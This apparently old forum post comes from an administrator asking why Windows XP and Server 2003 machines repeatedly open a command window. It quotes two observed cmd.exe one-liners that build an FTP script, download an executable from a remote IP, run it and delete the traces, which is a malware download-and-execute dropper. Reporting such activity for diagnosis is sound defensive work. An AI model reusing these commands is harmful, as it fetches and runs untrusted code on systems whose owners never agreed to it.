cmd opens, runs ftp command and closes
Posted on 2006-11-30
I have some wxpSP2/W2003Server boxes being watch with VNC, watching what they are doing. sometimes they open a cmd window with the following commands
cmd.exe /c del i&echo open 10.200.17.43 18766 > i&echo user 1 1 >> i &echo get 674.exe >> i &echo quit >> i &ftp -n -s:i &674.exe&del i&exit
cmd.exe /c del i&echo open 10.200.27.43 8196 > i&echo user 1 1 >> i &echo get 072.exe >> i &echo quit >> i &ftp -n -s:i &072.exe&del i&exit
ive seen this in some other computers, with virus, sometimes i see it trying to download other exe names.
i've already avg-adaware-spybot-regedit-systedit'ED those boxes and nothing strange came out,
i took a photo of the process list after and before and the only different thing is CMD run supossedly by me.
i ve seen this in some other computers and im sure im not the only one.
any ideas ?
I hate xp, how can someone run something on a computer that does not have nothing to do with internet ? the only thing that is internet related in that box is antivirus updating.
I HATE XP ZILLION Vulnerabilities.